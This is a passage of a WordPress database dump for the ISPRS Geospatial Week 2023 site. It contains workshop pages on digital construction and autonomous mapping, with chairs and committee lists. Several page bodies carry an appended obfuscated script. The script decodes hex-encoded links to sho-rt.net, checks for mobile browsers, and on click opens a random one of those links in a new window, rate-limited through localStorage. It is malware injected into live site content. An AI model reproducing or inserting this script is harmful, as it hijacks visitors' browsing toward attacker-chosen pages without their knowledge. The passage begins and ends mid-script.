)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','inherit','closed','closed','','2712-revision-v1','','','2022-10-09 05:01:09','2022-10-09 05:01:09','',2712,'https://gsw2023.com/?p=2716',0,'revision','',0),
(2717,1,'2022-10-09 05:05:38','2022-10-09 05:05:38','','Mehdi Maboudi<br>University of Braunschweig, Germany<br>(ICWG II/1-b)','','publish','closed','closed','','mehdi-maboudiuniversity-of-braunschweig-germanyicwg-ii-1-b','','','2022-10-09 05:13:12','2022-10-09 05:13:12','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2717',0,'dt_team','',0),
(2718,1,'2022-10-09 05:05:06','2022-10-09 05:05:06','','w101','','inherit','open','closed','','w101','','','2022-10-09 05:05:06','2022-10-09 05:05:06','',2717,'https://gsw2023.com/wp-content/uploads/2022/10/w101.jpg',0,'attachment','image/jpeg',0),
(2719,1,'2022-10-09 05:06:44','2022-10-09 05:06:44','','Yelda Turkan<br>Oregon State University, USA<br>(ICWG II/1-b)','','publish','closed','closed','','yelda-turkanoregon-state-university-usaicwg-ii-1-b','','','2022-10-09 05:13:05','2022-10-09 05:13:05','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2719',0,'dt_team','',0),
(2720,1,'2022-10-09 05:06:21','2022-10-09 05:06:21','','w102','','inherit','open','closed','','w102','','','2022-10-09 05:06:21','2022-10-09 05:06:21','',2719,'https://gsw2023.com/wp-content/uploads/2022/10/w102.jpg',0,'attachment','image/jpeg',0),
(2721,1,'2022-10-09 05:07:53','2022-10-09 05:07:53','','Kourosh Khoshelham<br>University of Melbourne, Australia<br>(ICWG II/1-b)','','publish','closed','closed','','kourosh-khoshelhamuniversity-of-melbourne-australiaicwg-ii-1-b','','','2022-10-09 05:12:57','2022-10-09 05:12:57','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2721',0,'dt_team','',0),
(2722,1,'2022-10-09 05:07:25','2022-10-09 05:07:25','','w103','','inherit','open','closed','','w103','','','2022-10-09 05:07:25','2022-10-09 05:07:25','',2721,'https://gsw2023.com/wp-content/uploads/2022/10/w103.jpg',0,'attachment','image/jpeg',0),
(2723,1,'2022-10-09 05:08:50','2022-10-09 05:08:50','','Jónatas Valença<br>University of Lisbon, Portugal<br>(ICWG II/1-b)','','publish','closed','closed','','jonatas-valencauniversity-of-lisbon-portugalicwg-ii-1-b','','','2022-10-09 05:12:49','2022-10-09 05:12:49','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2723',0,'dt_team','',0),
(2724,1,'2022-10-09 05:08:26','2022-10-09 05:08:26','','w104','','inherit','open','closed','','w104','','','2022-10-09 05:08:26','2022-10-09 05:08:26','',2723,'https://gsw2023.com/wp-content/uploads/2022/10/w104.jpg',0,'attachment','image/jpeg',0),
(2725,1,'2022-10-09 05:11:27','2022-10-09 05:11:27','','w1m','','inherit','open','closed','','w1m','','','2022-10-09 05:11:27','2022-10-09 05:11:27','',2712,'https://gsw2023.com/wp-content/uploads/2022/10/w1m.jpg',0,'attachment','image/jpeg',0),
(2726,1,'2022-10-09 05:11:41','2022-10-09 05:11:41','','w1m2','','inherit','open','closed','','w1m2','','','2022-10-09 05:11:41','2022-10-09 05:11:41','',2712,'https://gsw2023.com/wp-content/uploads/2022/10/w1m2.jpg',0,'attachment','image/jpeg',0),
(2727,1,'2022-10-09 05:12:05','2022-10-09 05:12:05','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2714\" img_size=\"1000x450\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">The past decade has witnessed a remarkable surge in the adoption of geospatial technologies by the architecture, engineering, and construction (AEC) industry globally. Geospatial data such as point clouds, imagery, and 3D models have contributed to the digital transformation of the AEC industry resulting in significant improvements in the safety, cost, and efficiency of construction projects. This workshop aims to bring together researchers and practitioners from geospatial and AEC communities to discuss the latest developments and future trends in digital construction. The workshop will include presentations on topics related to the application of geospatial technologies in digital construction, including but not limited to laser scanning, photogrammetry, positioning, unmanned aerial mapping, as-built 3D modelling, computer vision, additive manufacturing, visualization techniques, IoT sensors, real-time monitoring, and quality control. The workshop will be part of the ISPRS Geospatial Week 2023 to be held in Cairo, Egypt.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"46\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][vc_masonry_media_grid grid_id=\"vc_gid:1665292113786-bb277cdb-34c9-5\" include=\"2725,2726\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of data capture for digital construction</strong></h6>\n<h6>\n<strong>⦁ Sensors and systems for reality capture and automated inspection in digital construction</strong></h6>\n<h6>\n<strong>⦁ Progress monitoring of large construction projects</strong></h6>\n<h6>\n<strong>⦁ Data exchange between inspection systems and BIM</strong></h6>\n<h6>\n<strong>⦁ Augmented Reality and Mixed Reality in digital construction</strong></h6>\n<h6>\n<strong>⦁ As-built vs. as-designed and evaluation of geometric conformity in 3D printing</strong></h6>\n<h6>\n<strong>⦁ Computer vision in digital construction</strong></h6>\n<h6>\n<strong>⦁ Automated risk assessment and safety hazard identification</strong></h6>\n<h6>\n<strong>⦁ Increasing automation (IoT, Industry 4.0, etc.) and remote inspection</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Frédéric Bosché, University of Edinburgh, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Pingbo Tang, Carnegie Mellon University, United States</strong></h6>\n<h6>\n<strong>⦁ Shanaka Kristombu Baduge, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Markus Gerke, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Lucía Díaz-Vilariño, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ Davood Shojaei, University of Melbourne, Australia</strong></h6>\n<h6>\n<strong>⦁ Qian Wang, Southeast University, China</strong></h6>\n<h6>\n<strong>⦁ Diogo Ribeiro, Polytechnic of Porto, Portugal</strong></h6>\n<h6>\n<strong>⦁ Uwe Stilla, University of Munich, Germany</strong></h6>\n<h6>\n<strong>⦁ Richard Andrew Buswell, ⦁ Loughborough University, United Kingdom</strong></h6>\n<h6>\n<strong>⦁ Debaditya Acharya, RMIT University, Australia</strong></h6>\n<h6>\n<strong>⦁ Fernanda Leite, University of Texas at Austin, United States</strong></h6>\n<h6>\n<strong>⦁ Norman Hack, University of Braunschweig, Germany</strong></h6>\n<h6>\n<strong>⦁ Higinio González Jorge, University of Vigo, Spain</strong></h6>\n<h6>\n<strong>⦁ António Aguiar Costa, University of Lisbon, Portugal</strong></h6>\n<h6>\n<strong>⦁ Hossein Arefi, Mainz University of Applied Sciences, Germany</strong></h6>\n<h6>\n<strong>⦁ Giorgia Giardina, TU Delft, Netherlands</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Digital Construction','','inherit','closed','closed','','2712-revision-v1','','','2022-10-09 05:12:05','2022-10-09 05:12:05','',2712,'https://gsw2023.com/?p=2727',0,'revision','',0),
(2728,1,'2022-10-09 05:18:35','2022-10-09 05:18:35','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2581\" img_size=\"600x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This workshop will seek contributions covering the developments of autonomous mobile sensing and mapping systems and their use in the next generation of Geospatial applications. This workshop aims to bring together communities keen on developing the next generation of drones and uncrewed platforms in general, such as robotics and computer science.</strong></h5>\n<h5 style=\"text-align:justify; color:black;\"><strong>The focus will be on the advancements in the algorithms embedded in autonomous platforms navigating in outdoor and confined/indoor spaces. Topics of interest include, but not limited to, the development of real-time drone remote sensing analytics algorithms considering edge/fog/cloud computing, innovative georeferencing techniques, deep learning algorithms for situational awareness and autonomous navigation and exploration, as well as collaborative and swarm SLAM algorithms. Lightweight, energy-efficient, replicable hardware and software solutions and their embedding in larger networks of sensors, are particularly of interest for this workshop. A specific focus will be given to BVLOS solutions and the use of autonomous platforms in urban and rural environments. The Workshops will address different monitoring and surveying applications performed by innovative autonomous platforms such as precision farming, disaster mapping, cultural heritage survey, natural environment, and infrastructure monitoring. </strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"turquoise\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"41\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:orange;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Drones, ground and underwater autonomous systems</strong></h6>\n</li>\n<li>\n<h6><strong>Autonomous path planning, SLAM, navigation, drone-in-the-box, and VLOS/BVLOS exploration</strong></h6>\n</li>\n<li>\n<h6><strong>Edge, fog, and cloud computing for real-time scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>3D real-time mapping and semantic analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Next-generation autonomous platform applications</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative active and passive sensors embedded on autonomous platforms</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative and swarm platforms for Geospatial applications</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:orange;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bashar Alsadik, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Costas Armenakis, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>John Ray Bergado, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Filiberto Chiabrando, Politecnico di Torino, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Davide Cucci, Pix4D, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Martina Di Rita, Leica Geosystems, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Diogo Duarte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Markus Gerke, TU Braunschweig, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Diego González Aguilera, University of Salamanca, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Ejia Honkavaara, NLS, Finland</strong></h6>\n</li>\n<li>\n<h6><strong>Phillipp Jende, AIT, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Andreas Kamilaris, CYENS, Cyprus</strong></h6>\n</li>\n<li>\n<h6><strong>Taejung Kim, Inha University, South Korea</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\